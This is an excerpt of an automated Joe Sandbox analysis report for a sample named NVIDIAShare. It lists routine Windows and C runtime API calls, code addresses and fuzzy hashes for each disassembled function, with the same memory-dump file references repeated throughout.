                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
                                                            • Instruction ID: fc26a525c943a906db5dc6c05d9e3b3fbff72a473449783ad4b3c627160805c6
                                                            • Opcode Fuzzy Hash: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
                                                            • Instruction Fuzzy Hash: 4101D37260021AFBCF129F91DC05DEE7FA6FB48750F014259FE546A160CA3A8931EB90
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0102A56F), ref: 0102AF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
                                                            • Instruction ID: 0cd4227ebb1f8c79556e1aa949217fd28dea33b59e134ef13fec1096ed568925
                                                            • Opcode Fuzzy Hash: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
                                                            • Instruction Fuzzy Hash: 48F0BE7164521DFBCB125F55CC01CAEBFA9EF48B11B4142AAFD889B210DE364A10AB85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
                                                            • Instruction ID: 3a21702ad11497728db6cb2e0387121dbf0560affef3f07ab36b39d74d4d022f
                                                            • Opcode Fuzzy Hash: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
                                                            • Instruction Fuzzy Hash: 0FE02B7174122DBBD711AB6ADC02D6EBB9CEB54721B01029EFC869F300CD755E0187D5
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101EAF9
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Qo
                                                            • API String ID: 1269201914-1944013411
                                                            • Opcode ID: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
                                                            • Instruction ID: 6a392caec40f87ad32311ed5acac0c46c4695ec0245888cf11c8964c0505cc9c
                                                            • Opcode Fuzzy Hash: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
                                                            • Instruction Fuzzy Hash: CAB012C729A0437C30056201DE01C3F010CE6D1D90320C01FFCC8DC044DC853C060471
                                                            APIs
                                                              • Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102BA89,?,00000000), ref: 0102BC64
                                                            • GetCPInfo.KERNEL32(00000000,0102BA89,?,?,?,0102BA89,?,00000000), ref: 0102BC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
                                                            • Instruction ID: dc26fb32cbd1b25910bc1b75880fbe1b411f7fc4dd38961313886e2f0b740b56
                                                            • Opcode Fuzzy Hash: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
                                                            • Instruction Fuzzy Hash: 4251557090026A9FEB21EF39C4806FABFF5EF11300F2844AEC5D68B251EA399545CB91
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,01009A50,?,?,00000000,?,?,01008CBC,?), ref: 01009BAB
                                                            • GetLastError.KERNEL32(?,00000000,01008411,-00009570,00000000,000007F3), ref: 01009BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
                                                            • Instruction ID: 7557fd9c4df2f93c6a0fc0a5dc7a825324d032f683c303b97ce969a12a1e8d67
                                                            • Opcode Fuzzy Hash: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
                                                            • Instruction Fuzzy Hash: 9841E030504B018FFB26CF18C6845AABBE9FBD4338F44896DE8D9832D2D774A8448B91
                                                            APIs
                                                              • Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
                                                              • Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
                                                              • Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
                                                              • Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863
                                                              • Part of subcall function 0102BB4E: _abort.LIBCMT ref: 0102BB80
                                                              • Part of subcall function 0102BB4E: _free.LIBCMT ref: 0102BBB4
                                                              • Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6
                                                            • _free.LIBCMT ref: 0102BA9F
                                                            • _free.LIBCMT ref: 0102BAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
                                                            • Instruction ID: 93a33c4286e6209fb94db67e843b16da32ba58145b6613e35fb493199b194c46
                                                            • Opcode Fuzzy Hash: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
                                                            • Instruction Fuzzy Hash: 68312D3190422AAFDB21EFACD440BDD77F5EF40325F2541DAE5849B2A1EB765D40CB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01001E55
                                                              • Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF
                                                            • _wcslen.LIBCMT ref: 01001EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
                                                            • Instruction ID: e5c9adad6ff5dd0153a5b92cc96599982bf1690653ebffbaffdfee554a6e74f8
                                                            • Opcode Fuzzy Hash: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
                                                            • Instruction Fuzzy Hash: 92312C7190410A9FEF16DF98C944AEEBBF5BF58304F10009DE585A7290C7369E15CB60
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
                                                            • Instruction ID: 9d7a2f22e67313912af0d7f27b090b44b064072031fe6cfd9ec0339a49277ed1
                                                            • Opcode Fuzzy Hash: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
                                                            • Instruction Fuzzy Hash: 602128312882869FE716DF38C491AABBFE8AF51308F08495DF5C987182D339D90DCB61
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009F27,?,?,0100771A), ref: 010096E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009F27,?,?,0100771A), ref: 01009716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
                                                            • Instruction ID: afe85808430fbd69eac987090d6ecf19bd39f063ff70a4f5062835919f52a8bd
                                                            • Opcode Fuzzy Hash: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
                                                            • Instruction Fuzzy Hash: 5221B0715043446FF3718A69CC88BE7B7DCEB49328F000A19FADAC65C6C778A884C631
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 01009EC7
                                                            • GetLastError.KERNEL32 ref: 01009ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
                                                            • Instruction ID: eebab815987d1a6cb08529afbc0710887e3d1c3d3ade0c4db6194a97a0a7c768
                                                            • Opcode Fuzzy Hash: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
                                                            • Instruction Fuzzy Hash: F31129306007009BF736C628C884BA6B7E9AB44324F50066AE1D7D25D2D371FD45C760
                                                            APIs
                                                            • _free.LIBCMT ref: 01028E75
                                                              • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01041098,010017CE,?,?,00000007,?,?,?,010013D6,?,00000000), ref: 01028EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
                                                            • Instruction ID: 720aae6f796c395268371445326ddd5f49e266975745dca50c8381c85006ceac
                                                            • Opcode Fuzzy Hash: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
                                                            • Instruction Fuzzy Hash: 28F0F63A60113666EF712A299C04BAF3BDC8FD1B70F14C167E9D4AB1A0DB71D80082A1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 010110AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 010110B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
                                                            • Instruction ID: 21b0b98479194364472a30493d2ee0ad574a45758da9e8ffa8ad674cd6026171
                                                            • Opcode Fuzzy Hash: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
                                                            • Instruction Fuzzy Hash: CDE09232F00145A78F1E86B898159EBB6DDEB4410431442B9F683D7109F9B9D90147A0
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                              • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
                                                            • Instruction ID: dfecebb3c25db30f3a306a5fe564f37bbcbf9af66a54902cfd2954a1a09ce2ea
                                                            • Opcode Fuzzy Hash: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
                                                            • Instruction Fuzzy Hash: DCF0A03220020EBBEF125E60DC80FDA37ACBF04386F448050B984D6194DB72DA94DB10
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
                                                              • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
                                                            • Instruction ID: 250eb872ac89ff47c26f0ed0e59c379980176d0260efe9afa50024a3bcd7ff0b
                                                            • Opcode Fuzzy Hash: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
                                                            • Instruction Fuzzy Hash: 86E09235240219BBEB125E64DC84FDA779CBF083C2F484061B984D6094EB66D984DB50
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,01032641,000000FF), ref: 0101ACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,01032641,000000FF), ref: 0101ACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
